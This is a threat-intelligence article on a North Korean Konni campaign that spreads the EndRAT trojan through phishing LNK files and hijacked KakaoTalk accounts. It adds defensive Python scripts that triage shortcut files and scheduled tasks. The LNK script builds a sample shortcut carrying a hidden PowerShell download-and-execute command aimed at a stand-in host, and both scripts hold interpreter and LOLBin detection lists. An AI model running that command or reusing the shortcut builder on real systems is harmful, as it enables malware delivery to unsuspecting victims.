Konni Spreads EndRAT via Phishing and Uses KakaoTalk to Distribute Malware

Cybersecurity researchers have identified a new cyber espionage campaign carried out by the North Korean threat group Konni. The attackers are using phishing emails to compromise victims and then leveraging the popular messaging platform KakaoTalk to distribute malware to additional targets.

The activity was analyzed by South Korean cybersecurity company Genians, whose researchers observed a multi-stage attack designed to maintain long-term access to infected systems while collecting sensitive information.

Phishing Email Used as Initial Attack Vector

According to analysts at the Genians Security Center (GSC), the attack begins with a carefully crafted spear phishing email.

The message is disguised as an official notice claiming the recipient has been appointed as a lecturer on North Korean human rights topics. The email encourages the recipient to open a ZIP attachment that supposedly contains related documents.

Inside the archive is a malicious Windows shortcut file (LNK). When the victim opens it, the shortcut silently runs a command that downloads additional malicious components from a remote server.
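A ZIP-wrapped shortcut only looks like a document; the shortcut's target and command-line arguments are what matter. As an added triage example (not code from Genians or from the campaign), the script below opens a ZIP attachment in memory, parses each embedded `.lnk` according to the public Shell Link format (76-byte header, optional IDList and LinkInfo blocks, then length-prefixed UTF-16 StringData), and applies a few heuristics of my own: interpreter or LOLBin target, a URL in the arguments, and a minimized window. The sample archive, the file names and the `example.invalid` URL are constructed here so the script runs offline.

```python
import io
import struct
import zipfile

# Shell Link (.lnk) header constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that opens the window minimized, a common "run quietly" trick
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                 (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields and ShowCommand of a .lnk; skips IDList/LinkInfo when present."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (2 bytes) followed by the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize (4 bytes) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for flag, key in STRING_FIELDS:            # each: CountCharacters (2 bytes) + chars, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return info


INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "curl")


def lnk_indicators(info: dict) -> list:
    """Heuristics (my own, not from the report) for a shortcut acting as a download cradle."""
    target = (info.get("relative_path", "") + " " + info.get("icon_location", "")).lower()
    args = info.get("arguments", "").lower()
    reasons = []
    if any(i in target for i in INTERPRETERS):
        reasons.append("target is a script interpreter or LOLBin")
    if "http://" in args or "https://" in args:
        reasons.append("arguments contain a URL")
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised (SW_SHOWMINNOACTIVE)")
    if len(args) > 200:
        reasons.append("unusually long argument string")
    return reasons


def scan_zip(zip_bytes: bytes) -> dict:
    """Map every *.lnk inside a ZIP attachment to its indicator list (empty list = nothing flagged)."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".lnk"):
                findings[name] = lnk_indicators(parse_lnk(zf.read(name)))
    return findings


# --- constructed sample so the script runs offline; not an artifact from the campaign -----
def _string_data(s: str) -> bytes:
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str, working_dir: str = "", show_command: int = 1) -> bytes:
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + _string_data(relative_path) + _string_data(working_dir) + _string_data(arguments)


def build_sample_zip() -> bytes:
    lnk = build_lnk(
        relative_path="..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        arguments='-w hidden -c "iwr http://example.invalid/s2 -OutFile $env:TEMP\\s.exe; start $env:TEMP\\s.exe"',
        show_command=SW_SHOWMINNOACTIVE,
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Lecturer_Appointment.pdf.lnk", lnk)  # double extension hides the .lnk in Explorer
        zf.writestr("Lecturer_Appointment.pdf", b"%PDF-1.4 decoy")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip(build_sample_zip()).items():
        print(name, "->", reasons or "clean")
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo block before the strings, which is why the parser skips both by their size fields rather than assuming a fixed offset; the relative path and arguments are the fields worth logging at the mail gateway, since the arguments are where the download command lives.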

Malware Establishes Persistence and Hides Its Activity

Once executed, the malicious LNK file downloads the main payload and installs it on the victim’s system.

To ensure long-term access, the malware creates scheduled tasks within the operating system so that it runs automatically. At the same time, a legitimate-looking PDF document is displayed to the user as a decoy to distract them from the malicious activity happening in the background.
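Scheduled-task persistence leaves a durable artifact: every registered task is stored as an XML file under the Task Scheduler store, and the same XML appears in Security event 4698 when the task is created. As an added example (my own triage logic, not Genians' tooling), the script below parses that XML and flags the traits a responder would look for in a case like this one: an executable under a user-writable path, a system binary name living outside \Windows\, an AutoIt script passed as an argument, a hidden task, and a short repetition interval. The two task definitions are constructed samples; `scan_tasks_dir` walks the real store on a Windows host.

```python
import ntpath
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TASKS_DIR = r"C:\Windows\System32\Tasks"  # registered tasks live here as extension-less XML files

USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|programdata|users\\public|downloads)\\", re.I)
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32", "autoit")
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "dllhost.exe"}


def interval_minutes(iso):
    """Parse the PTnHnMnS durations Task Scheduler writes (assumption: no day part); None if unparseable."""
    m = re.fullmatch(r"PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", iso or "")
    if not m:
        return None
    h, mi, s = (int(x) if x else 0 for x in m.groups())
    return h * 60 + mi + s / 60


def triage_task(xml_text) -> list:
    """Return a list of human-readable reasons a task definition looks like persistence; [] if clean."""
    root = ET.fromstring(xml_text)
    reasons = []
    for exec_ in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (exec_.findtext("t:Command", "", NS) or "").strip()
        args = (exec_.findtext("t:Arguments", "", NS) or "").strip()
        low = cmd.lower()
        if USER_WRITABLE.search(cmd):
            reasons.append(f"executable in user-writable path: {cmd}")
        if any(i in low for i in INTERPRETERS):
            reasons.append(f"script interpreter as action: {cmd}")
        if ntpath.basename(low) in SYSTEM_NAMES and "\\windows\\" not in low:
            reasons.append(f"system binary name outside \\Windows\\: {cmd}")
        if ".au3" in args.lower() or ".a3x" in args.lower():
            reasons.append(f"AutoIt script passed as argument: {args}")
    if (root.findtext("t:Settings/t:Hidden", "", NS) or "").strip().lower() == "true":
        reasons.append("task hidden from the Task Scheduler UI")
    for node in root.findall(".//t:Repetition/t:Interval", NS):
        mins = interval_minutes(node.text)
        if mins is not None and mins <= 15:
            reasons.append(f"repeats every {node.text}")
    return reasons


def scan_tasks_dir(path=TASKS_DIR) -> dict:
    """Walk the on-disk task store (files are UTF-16 XML, so read bytes) and return {file: reasons}."""
    flagged = {}
    for dirpath, _, files in os.walk(path):
        for f in files:
            full = os.path.join(dirpath, f)
            with open(full, "rb") as fh:
                try:
                    reasons = triage_task(fh.read())
                except ET.ParseError:
                    continue
            if reasons:
                flagged[full] = reasons
    return flagged


# Constructed samples (not real artifacts from the campaign). The on-disk files also carry an
# XML declaration with encoding="UTF-16"; it is omitted here so the strings parse as str.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>DESKTOP-1\user</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT3M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2025-01-01T00:00:00</StartBoundary><Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit></Settings>
  <Actions Context="Author"><Exec>
    <Command>C:\Users\user\AppData\Roaming\Microsoft\svchost.exe</Command>
    <Arguments>C:\Users\user\AppData\Roaming\Microsoft\u.au3</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>%windir%\system32\defrag.exe</Command>
    <Arguments>-c -h -o</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(label, "->", triage_task(xml) or "clean")
```

The same function works on the `TaskContent` field of event 4698, which is the cheaper place to catch this at creation time rather than on a later disk sweep; tune the interval threshold and path list to the estate, since some legitimate agents also repeat every few minutes from ProgramData.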


EndRAT Gives Attackers Full Remote Access

The downloaded payload is a remote access trojan known as EndRAT, also called EndClient RAT.

The malware is written using the scripting language AutoIt and provides attackers with extensive control over the compromised computer. Its capabilities include:

  • Remote command execution
  • File browsing and management
  • Data exfiltration
  • Remote shell access
  • Persistent system control

Through these functions, attackers can monitor victim activity and extract valuable internal documents.

Multiple RAT Families Deployed on High Value Targets

During forensic analysis, researchers also discovered additional malware components on infected systems.

These included AutoIt-based scripts associated with RftRAT and the well-known remote access malware Remcos RAT.

The presence of several RAT families suggests the attackers considered the compromised target highly valuable and deployed multiple tools to ensure continued access even if one malware strain was removed.

KakaoTalk Accounts Used to Spread Malware

One of the most notable aspects of this campaign is the use of the victim’s own messaging account to spread malware further.

After gaining control of the system, the attackers accessed the victim’s active KakaoTalk desktop application. They then sent malicious ZIP files to selected contacts from the victim’s friend list.

These files were disguised as documents on North Korea-related topics to increase the likelihood that recipients would open them.

This tactic exploits the trust between contacts, making the attack more convincing and increasing the chances of successful infection.

Similar Tactics Observed in Earlier Campaign

Researchers previously documented similar behavior from the Konni group in November 2025.

In that campaign, attackers also used compromised KakaoTalk sessions to distribute malicious archives to contacts. At the same time, they remotely wiped victims’ Android devices using stolen Google account credentials.

Multi Stage Espionage Operation

Security experts believe the latest activity represents a sophisticated espionage campaign rather than a simple phishing attack.

The operation combines several techniques including targeted phishing, long term persistence, information theft, and social trust exploitation through messaging platforms.
